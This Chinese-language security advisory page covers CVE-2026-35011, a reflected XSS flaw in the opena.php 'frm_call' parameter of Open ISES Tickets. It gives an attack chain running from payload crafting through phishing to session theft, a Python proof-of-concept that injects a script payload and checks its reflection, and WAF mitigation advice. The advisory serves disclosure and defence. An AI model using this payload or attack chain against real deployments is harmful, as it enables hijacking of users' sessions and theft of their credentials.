CVE-2026-35011 CVSS 4.6 中危

CVE-2026-35011 Open ISES Tickets反射型XSS漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35011

漏洞类型

反射型跨站脚本攻击

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open ISES Tickets

漏洞概述

Open ISES Tickets 在 3.44.2 之前的版本中包含一个反射型跨站脚本（XSS）漏洞。该漏洞是由于 `opena.php` 文件未对 `frm_call` GET 参数进行充分消毒处理所致。攻击者可构造恶意链接诱导已认证用户点击，致使用户浏览器执行任意 JavaScript 代码，进而窃取敏感信息。

技术细节

该漏洞属于典型的反射型跨站脚本攻击（Reflected XSS）。其技术原理在于 Open ISES Tickets 的 `opena.php` 接口未对输入参数 `frm_call` 实施严格的输出编码或过滤。攻击者可以构建包含恶意 JavaScript 的 URL，例如将 `<script>` 标签注入参数。由于应用直接将该参数值反射到页面输出中，当具有低权限的认证用户被诱导访问该 URL 时，恶意代码会随 HTML 响应返回并在浏览器端解析执行。攻击链包括：侦察目标、构造 Payload、社会工程学投递、代码执行。利用此漏洞，攻击者能够绕过同源策略限制，在受害者会话中执行任意脚本，从而窃取登录凭证、篡改数据或执行进一步的内网渗透攻击，对系统的机密性和完整性构成威胁。

攻击链分析

STEP 1

1. 构造攻击载荷

攻击者分析 `opena.php` 代码逻辑，确认 `frm_call` 参数未经过滤直接输出，并构造包含恶意 JavaScript 代码的 URL。

STEP 2

2. 投递恶意链接

攻击者通过网络钓鱼、社会工程学或其他方式，将包含恶意载荷的 URL 发送给目标系统的已认证用户。

STEP 3

3. 用户触发漏洞

受害者（低权限用户）点击链接，向服务器发送带有恶意参数的 GET 请求。

STEP 4

4. 执行恶意代码

服务器将恶意脚本反射到响应页面中，受害者的浏览器解析并执行该脚本，攻击者借此窃取 Session 或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept (PoC) for CVE-2026-35011
# This script demonstrates the Reflected XSS vulnerability in Open ISES Tickets
# by sending a malicious payload to the 'frm_call' parameter.

import requests

def check_xss_vulnerability(target_url):
    """
    Checks if the target is vulnerable to CVE-2026-35011.
    """
    # The vulnerable endpoint is opena.php
    endpoint = "/opena.php"
    
    # Malicious payload to test JavaScript execution
    # Using a simple alert box to confirm execution
    xss_payload = "<script>alert('CVE-2026-35011_XSS_Test');</script>"
    
    # Construct the full URL with the vulnerable parameter
    params = {
        "frm_call": xss_payload
    }
    
    try:
        # Send the GET request
        response = requests.get(target_url + endpoint, params=params, timeout=10)
        
        # Check if the payload is reflected in the response body unsanitized
        if xss_payload in response.text:
            print("[+] Vulnerability Confirmed: Payload reflected in response.")
            print(f"[+] Target URL: {response.url}")
            return True
        else:
            print("[-] Vulnerability Not Found: Payload not reflected or sanitized.")
            return False
            
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8080"
    check_xss_vulnerability(target)

影响范围

Open ISES Tickets < 3.44.2

防御指南

临时缓解措施

如果无法立即升级，建议在 Web 应用防火墙（WAF）上部署规则，拦截针对 `opena.php` 的请求中包含常见 XSS 特征字符（如 `<script>`, `javascript:`, `onerror=` 等）的 `frm_call` 参数。同时，加强对用户的安全意识培训，警惕来源不明的链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表